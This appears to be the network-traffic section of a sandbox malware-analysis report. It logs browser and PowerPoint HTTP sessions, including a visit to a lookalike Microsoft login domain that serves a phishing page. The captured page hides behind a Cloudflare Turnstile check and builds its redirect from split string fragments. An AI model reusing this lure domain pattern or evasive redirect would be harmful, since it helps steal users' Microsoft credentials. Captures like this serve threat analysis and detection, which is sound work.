                                                                                                                              2024-10-04 13:10:52 UTC1379INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Data Ascii:
                                                                                                                              2024-10-04 13:10:52 UTC1379INData Raw: 00 00 00 00 67 f5 6b 4d 58 d7 72 6d 97 05 36 ea 35 ce 00 f0 5e 32 ab 89 0a 83 d5 8f 16 41 b0 51 08 bd 52 af 7b 00 ae d7 7f 36 e2 81 a6 66 36 22 ee 08 7c e3 5f fe 70 34 fa ae b9 4d 24 2a 7f 3d 80 cb f5 0f e7 4f e8 52 0a bb 41 fe 83 32 9b df 70 b3 76 ce 35 ff 00 e7 03 4f aa eb 94 d2 42 a7 f3 d8 0c bf 50 fe 74 fe 81 20 60 69 da 11 5c d3 f0 5d 28 85 fb f8 a4 ca e5 d6 77 1c 36 0f e7 df e9 cf e7 13 51 be 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 e7 9e ad 68 86 35 ac 17 7a c2 0d 96 02 4e b4 42 eb 59 0d dc a2 56 f7 ea 71 65 a1 f3 f6 4b 5e e8 17 73 d0 0a f5 4e 9d b1 99 cd 9a bd 3c 5f 80 fe 73 fe 8c fe 73 3f
                                                                                                                              Data Ascii: gkMXrm65^2AQR{6f6"|_p4M$*=ORA2pv5OBPt `i\](w6Q(h5zNBYVqeK^sN<_ss?
                                                                                                                              2024-10-04 13:10:52 UTC1379INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1f ff c4 00 35 10 00 02 02 01 02 04 05 03 03 03 04 02 03 00 00 00 04 05 02 03 01 00 06 14 15 34 35 10 11 12 13 30 20 33 70 21 32 36 16 31 40 22 24 25 60 50 80 90 a0 c0 ff da 00 08 01 01 00 01 05 02 ff 00 dd 3b ac 8d 35 73 60 b5 cd 82
                                                                                                                              Data Ascii: 5450 3p!261@"$%`P;5s`
                                                                                                                              2024-10-04 13:10:52 UTC1379INData Raw: 87 3e 78 45 7e 87 47 44 33 ab 52 55 65 ab 96 c0 3b 7c 4c 52 2d f9 92 1b 75 14 36 e8 45 22 d1 9d 67 1e 78 bd 15 59 d6 51 5f aa 50 fe a2 8d 48 d0 f0 2d 38 d7 66 48 6e d4 10 d9 e6 1a b1 47 cf 83 15 b0 32 ea 92 55 5d 9e 06 89 49 75 d8 86 cf 3a 90 cf ce b8 fa 2b fc 30 65 59 bc 6e 49 6e b9 25 ba e4 96 eb 92 5b ae 49 6e b9 25 ba e4 96 eb 92 5b ae 49 6e 96 ad 98 a4 9b 4e 6f a3 95 59 ae 55 66 b9 55 9a e5 56 6b 95 59 ae 55 66 b9 55 9a e5 56 6b 95 59 a5 e2 48 69 7e 50 22 cc 53 4f 37 ab 5c e2 ad 73 7a b5 cd ea d7 37 ab 5c de ad 73 8a b5 cd ea d7 37 ab 42 30 81 37 5d 66 2a 87 1b 0d 71 b0 d7 1b 0d 71 b0 d7 1b 0d 71 b0 d7 1b 0d 71 b0 d7 1b 0d 51 7e 2e cf e5 06 7d 07 c2 8f ae 3f a7 f8 56 fe ef aa 72 8c 23 73 91 21 9e 7d 56 ab 76 2c b4 3d f5 11 0f f2 18 b2 a8 3c 84 e2 ab
                                                                                                                              Data Ascii: >xE~GD3RUe;|LR-u6E"gxYQ_PH-8fHnG2U]Iu:+0eYnIn%[In%[InNoYUfUVkYUfUVkYHi~P"SO7\sz7\s7B07]f*qqqqQ~.}?Vr#s!}Vv,=<
                                                                                                                              2024-10-04 13:10:52 UTC1379INData Raw: 95 6e 5e 67 92 36 f4 dd 44 25 99 33 22 78 3c 6b 52 ca 40 cb d6 74 16 c9 ca 72 c2 22 b2 c5 f0 66 c2 95 f0 27 74 93 6d a7 bf b6 76 c9 fb 91 6f fe a0 0f 0b 0b 72 f6 51 45 b8 ee b8 ad 3a 6e 3a c8 0d 76 e3 61 59 2d 9d ab bd 43 31 d9 52 cd 85 2b e0 4e e9 26 db 4f 7f 6c ed 93 f7 22 df fd 40 1e 16 16 e5 ec a2 8b 71 dd 71 5a 74 e2 b0 33 64 b7 54 e0 06 e6 22 ab e5 74 38 66 3b 9c 88 48 5d c5 98 2b 31 c3 fa b3 b6 dc e5 8e 1c 48 fc 08 44 6d 89 34 d9 b9 fd ef c6 3b eb b5 ec 7e ef ad d9 df d5 76 bd e3 d8 f6 27 59 bb 71 3c a2 da 6d e9 0e 37 c2 a2 c4 4a 35 82 2c df da d8 fd a3 c7 75 28 30 e2 92 8b 30 d5 ef 8b e8 b7 3b 2a 5e a4 de 2d e3 88 b6 04 4a 02 1f 7c 53 19 2e d9 02 d1 79 1a 6b 0c 0a e2 eb 23 55 02 fa 9a bd c7 e9 a7 41 e0 e5 aa 0b 98 2c 34 de 38 8b 60 44 a0 21 f7 c5
                                                                                                                              Data Ascii: n^g6D%3"x<kR@tr"f'tmvorQE:n:vaY-C1R+N&Ol"@qqZt3dT"t8f;H]+1HDm4;~v'Yq<m7J5,u(00;*^-J|S.yk#UA,48`D!
                                                                                                                              2024-10-04 13:10:52 UTC1379INData Raw: 9f 16 dd b4 41 b4 57 57 60 d1 58 fb ed cf 63 c2 b0 62 f7 01 b0 93 7e 1d 56 5e 95 4e 2a b2 16 d5 ff 00 71 62 1d 67 6e e8 ed 75 d8 96 e8 ae 14 ed c7 1e ee 66 7d 0f 6c 0e eb a2 02 07 10 77 95 78 a4 62 36 a5 b8 7c b8 67 b7 e0 b0 8a a5 fc c5 db 34 e6 85 3b 82 91 88 5f 6e 1f 2e 19 f1 15 95 b5 5f 17 01 c1 71 07 79 56 77 f0 75 f0 8e 14 57 99 7f 47 03 ed f0 1b 2f d3 ec b6 ed 5b 47 d1 c8 97 e2 39 de 21 93 c9 f5 b5 85 e1 93 eb 76 0f ef a6 cf fc e9 81 dd cc a6 da 38 96 ec de bd 99 bf 75 af f9 b2 58 b3 99 d7 8a c2 6d f4 ce cc 2c dc a3 53 c0 d4 ab d5 70 5b 72 0e 32 b1 58 a4 c3 71 68 42 8f 38 85 b1 22 1b b9 14 71 fd 46 db 05 4b 77 38 19 c5 c1 01 1c c0 1d d7 fa b1 63 91 70 13 6c 0f 36 3b bb b0 b7 f7 65 23 e8 7b 60 65 d5 ed d2 c7 22 e0 27 f8 f5 93 b6 b3 cb 9a 5f fc d9 6c
                                                                                                                              Data Ascii: AWW`Xcb~V^N*qbgnuf}lwxb6|g4;_n._qyVwuWG/[G9!v8uXm,Sp[r2XqhB8"qFKw8cpl6;e#{`e"'_l
                                                                                                                              2024-10-04 13:10:52 UTC1379INData Raw: fd 7f 9a a1 1a 8c ca f1 49 a1 16 af da 58 67 0c 5a a1 1a 8c ca f1 49 a1 16 af da 58 67 0c 5a a1 1a 8c ca f1 49 a1 16 af da 58 67 0c 5a a1 1a 8c ca f1 49 a1 16 af da 58 67 0c 5a a1 33 f4 6c 8c c5 f9 1c c5 f9 1c c5 f9 1c c5 f9 1c c2 cf 69 34 99 91 08 83 92 ab 2b 69 82 18 5b c6 43 0b 78 c8 61 6f 19 0c 2d e3 20 e2 93 49 22 4c b5 fb fe 9f 3f ff c4 00 4f 10 00 01 02 03 03 07 06 0c 03 05 05 06 07 00 00 00 01 02 03 00 04 11 12 21 31 05 10 13 22 32 41 71 33 42 51 61 72 91 14 20 23 30 52 70 73 81 82 a1 b1 c1 62 92 d1 15 34 40 43 f0 63 83 b2 c2 e1 24 50 60 74 a2 f1 53 80 90 a0 a3 c0 d2 ff da 00 08 01 01 00 06 3f 02 ff 00 ce 99 71 7b 23 18 e5 15 f9 63 94 57 e5 8e 51 5f 96 39 43 f9 63 94 57 e5 8e 51 5f 96 39 45 7e 58 e5 0f e5 8e 51 5f 96 34 6d 28 95 70 8b 6b 34 11 b6
                                                                                                                              Data Ascii: IXgZIXgZIXgZIXgZ3li4+i[Cxao- I"L?O!1"2Aq3BQar #0Rpsb4@Cc$P`tS?q{#cWQ_9CcWQ_9E~XQ_4m(pk4
                                                                                                                              2024-10-04 13:10:52 UTC1379INData Raw: 43 dd b3 0b ec 67 33 4c 8a fa 63 ef 9a c8 72 d0 fc 57 c5 2d 25 1d 91 15 30 26 9e 14 03 60 42 fb 26 3c 8b 85 3d 51 7a 1a 3e e8 1a 52 28 30 02 12 d2 07 13 d1 01 23 00 29 06 69 a1 54 1d a1 d1 9a cd b0 b1 f8 84 59 b6 10 3f 08 cd e1 4f 0a 1e 60 fb e6 47 62 1a ed 8c ee 5d 72 8d a1 01 c6 d5 65 42 2c da 40 eb 09 86 c9 bc 94 8f 53 2f 70 f3 5f 09 83 c4 79 a7 38 78 ca 64 aa c8 3b e3 97 5f 74 21 a0 6b 64 53 32 da 56 0a 14 8e 5d 7d d0 12 9c 00 a6 6d 12 94 53 7d 6e 8e 5d 7d d0 86 41 a8 4e f8 0d a9 65 34 35 ba 39 75 f7 42 51 e8 8a 66 f2 a8 bf d2 18 c7 92 7c 53 f1 08 bd e6 e2 af 2c b9 d5 80 cc a5 e9 d7 ac 6b 84 17 12 e2 95 51 4b c7 89 68 55 a5 74 a6 35 5f 41 e2 23 59 f4 0e 02 2d 2a ae ab f1 66 20 ef 8a b2 f2 93 d4 6f 8e 59 b8 f2 cf fe 51 16 19 45 9f be 7b 48 ab 4a ea c2
                                                                                                                              Data Ascii: Cg3LcrW-%0&`B&<=Qz>R(0#)iTY?O`Gb]reB,@S/p_y8xd;_t!kdS2V]}mS}n]}ANe459uBQf|S,kQKhUt5_A#Y-*f oYQE{HJ


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              10192.168.2.17497233.5.1.1224432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:10:51 UTC618OUTGET /favicon.ico HTTP/1.1
                                                                                                                              Host: crewbloom.s3.amazonaws.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://crewbloom.s3.amazonaws.com/34873.html
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:10:52 UTC297INHTTP/1.1 403 Forbidden
                                                                                                                              x-amz-request-id: M4RGGHMMMNGH1FQ7
                                                                                                                              x-amz-id-2: J5FNCwYXYTAg7fPoukB+g+Tfvb9a72793pOw24cgCZ69wzj/Y5z6lbGwnDL5Rz2FwX/nHDyi7TPkKohyiW2t3Q==
                                                                                                                              Content-Type: application/xml
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Date: Fri, 04 Oct 2024 13:10:51 GMT
                                                                                                                              Server: AmazonS3
                                                                                                                              Connection: close
                                                                                                                              2024-10-04 13:10:52 UTC266INData Raw: 66 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 41 63 63 65 73 73 44 65 6e 69 65 64 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 4d 34 52 47 47 48 4d 4d 4d 4e 47 48 31 46 51 37 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 4a 35 46 4e 43 77 59 58 59 54 41 67 37 66 50 6f 75 6b 42 2b 67 2b 54 66 76 62 39 61 37 32 37 39 33 70 4f 77 32 34 63 67 43 5a 36 39 77 7a 6a 2f 59 35 7a 36 6c 62 47 77 6e 44 4c 35 52 7a 32 46 77 58 2f 6e 48 44 79 69 37 54 50 6b 4b 6f 68 79 69 57 32 74 33 51 3d 3d 3c 2f 48 6f 73 74 49 64 3e 3c 2f 45 72
                                                                                                                              Data Ascii: ff<?xml version="1.0" encoding="UTF-8"?><Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>M4RGGHMMMNGH1FQ7</RequestId><HostId>J5FNCwYXYTAg7fPoukB+g+Tfvb9a72793pOw24cgCZ69wzj/Y5z6lbGwnDL5Rz2FwX/nHDyi7TPkKohyiW2t3Q==</HostId></Er


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              11192.168.2.174972713.107.246.604436380C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:10:52 UTC212OUTGET /rules/rule120603v8s19.xml HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Accept-Encoding: gzip
                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft PowerPoint 16.0.16827; Pro)
                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                              2024-10-04 13:10:52 UTC563INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:10:52 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 2128
                                                                                                                              Connection: close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                              ETag: "0x8DC582BA41F3C62"
                                                                                                                              x-ms-request-id: fafd92b7-601e-0050-3886-152c9c000000
                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                              x-azure-ref: 20241004T131052Z-15767c5fc55852fxfeh7csa2dn0000000ckg0000000017yg
                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:10:52 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              12192.168.2.1749729104.26.12.694432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:10:58 UTC712OUTGET /KUtIdFka HTTP/1.1
                                                                                                                              Host: l0gin-microso.ftlivedocs.tech
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                              Referer: https://crewbloom.s3.amazonaws.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:10:59 UTC713INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:10:59 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Set-Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4; Path=/; Domain=ftlivedocs.tech; Expires=Fri, 04 Oct 2024 14:10:59 GMT; Max-Age=3600
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A78lPhGMzfDcfhoerWrH%2B38tAZJ6qxvA5fYHFK7maEchQr0t%2FcrEIcI6pAZHuzW6I%2FawnCFJqGsA4qc7z1vlaItLgbdIWE99ogGCYmSN1CT2Pljo1K3EjtqNsrQApTrWULT81Kgyshy6BlTar1%2F3"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a496a3b5e6a-EWR
                                                                                                                              2024-10-04 13:10:59 UTC656INData Raw: 31 62 65 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 32 2e 31 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 20 61 73 79 6e 63 20 64 65 66 65 72 3e 3c 2f
                                                                                                                              Data Ascii: 1be5<!DOCTYPE html><html lang="en-US"><head> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback" async defer></
                                                                                                                              2024-10-04 13:10:59 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 73 69 74 65 6b 65 79 3a 20 27 30 78 34 41 41 41 41 41 41 41 77 64 39 68 77 35 72 76 6f 44 6a 4d 37 49 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 6c 6c 62 61 63 6b 3a 20 66 75 6e 63 74 69 6f 6e 28 74 6f 6b 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 45 6e 74 65 72 53 69 74 65 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 3b 0a 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6c 6f 61 64 69 6e
                                                                                                                              Data Ascii: sitekey: '0x4AAAAAAAwd9hw5rvoDjM7I', callback: function(token) { EnterSite(); }, }); }; </script></head><body class="no-js"> <div class="main-wrapper" role="main"> <div id="loadin
                                                                                                                              2024-10-04 13:10:59 UTC1369INData Raw: 3b 68 65 69 67 68 74 3a 31 38 30 70 78 7d 23 4d 53 4c 6f 67 6f 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 62 6f 74 74 6f 6d 3a 33 36 70 78 3b 6c 65 66 74 3a 63 61 6c 63 28 35 30 76 77 20 2d 20 35 30 70 78 29 7d 2e 64 61 72 6b 20 23 6c 6f 61 64 69 6e 67 53 63 72 65 65 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 33 7d 2e 64 61 72 6b 4e 65 77 20 23 6c 6f 61 64 69 6e 67 53 63 72 65 65 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 66 31 66 31 66 7d 3a 72 6f 6f 74 7b 2d 2d 73 3a 31 38 30 70 78 3b 2d 2d 65 6e 76 57 3a 31 33 30 70 78 3b 2d 2d 65 6e 76 48 3a 37 31 70 78 3b 2d 2d 63 61 6c 57 3a 31 31 38 70 78 3b 2d 2d 73 71 57 3a 63 61 6c 63 28 76 61 72 28 2d 2d 63 61 6c 57 29 20 2f 20 33 29 3b 2d 2d 73 71 48 3a 33 37 70
                                                                                                                              Data Ascii: ;height:180px}#MSLogo{position:fixed;bottom:36px;left:calc(50vw - 50px)}.dark #loadingScreen{background-color:#333}.darkNew #loadingScreen{background-color:#1f1f1f}:root{--s:180px;--envW:130px;--envH:71px;--calW:118px;--sqW:calc(var(--calW) / 3);--sqH:37p
                                                                                                                              2024-10-04 13:10:59 UTC1369INData Raw: 61 72 67 69 6e 2d 74 6f 70 3a 2d 37 30 70 78 7d 23 63 61 6c 2c 23 63 61 6c 3e 2e 72 2c 23 63 61 6c 3e 2e 74 7b 77 69 64 74 68 3a 76 61 72 28 2d 2d 63 61 6c 57 29 7d 23 63 61 6c 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 68 65 69 67 68 74 3a 76 61 72 28 2d 2d 63 61 6c 48 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 37 70 78 3b 6d 61 72 67 69 6e 3a 2d 33 30 36 70 78 20 61 75 74 6f 20 30 3b 61 6e 69 6d 61 74 69 6f 6e 3a 63 61 6c 2d 62 6f 75 6e 63 65 20 76 61 72 28 2d 2d 64 75 72 29 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 2e 35 2c 30 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61
                                                                                                                              Data Ascii: argin-top:-70px}#cal,#cal>.r,#cal>.t{width:var(--calW)}#cal{flex-direction:row;flex-wrap:wrap;height:var(--calH);border-radius:7px;margin:-306px auto 0;animation:cal-bounce var(--dur) infinite;animation-timing-function:cubic-bezier(0,.5,0,1);transform:tra
                                                                                                                              2024-10-04 13:10:59 UTC1369INData Raw: 46 6c 61 70 7b 77 69 64 74 68 3a 76 61 72 28 2d 2d 65 6e 76 57 29 3b 61 6e 69 6d 61 74 69 6f 6e 3a 63 6c 6f 73 65 64 2d 66 6c 61 70 2d 73 77 69 6e 67 20 76 61 72 28 2d 2d 64 75 72 29 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 33 32 2c 30 2c 2e 36 37 2c 30 29 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 74 6f 70 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 63 61 6c 63 28 2d 31 20 2a 20 76 61 72 28 2d 2d 65 6e 76 48 29 29 29 20 72 6f 74 61 74 65 33 64 28 31 2c 30 2c 30 2c 39 30 64 65 67 29 7d 40 6b 65 79 66 72 61 6d 65 73 20 63 6c 6f 73 65 64 2d 66 6c 61 70 2d 73 77 69 6e 67 7b 30 25 2c 31 30 30 25 2c 37 37 25 2c 38 2e 35
                                                                                                                              Data Ascii: Flap{width:var(--envW);animation:closed-flap-swing var(--dur) infinite;animation-timing-function:cubic-bezier(.32,0,.67,0);transform-origin:top;transform:translateY(calc(-1 * var(--envH))) rotate3d(1,0,0,90deg)}@keyframes closed-flap-swing{0%,100%,77%,8.5
                                                                                                                              2024-10-04 13:10:59 UTC1017INData Raw: 61 27 20 2b 20 27 3f 53 27 20 2b 20 27 3d 27 20 2b 20 27 55 27 20 2b 20 27 6d 78 75 27 20 2b 20 27 48 6c 27 20 2b 20 27 6f 27 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 63 64 35 36 61 34 39 36 61 33 62 35 65 36 61 27 2c 74 3a 27 4d 54 63 79 4f 44 41 30 4e 7a 51 31 4f
                                                                                                                              Data Ascii: a' + '?S' + '=' + 'U' + 'mxu' + 'Hl' + 'o' } </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8cd56a496a3b5e6a',t:'MTcyODA0NzQ1O
                                                                                                                              2024-10-04 13:10:59 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                                                              Data Ascii: 1
                                                                                                                              2024-10-04 13:10:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
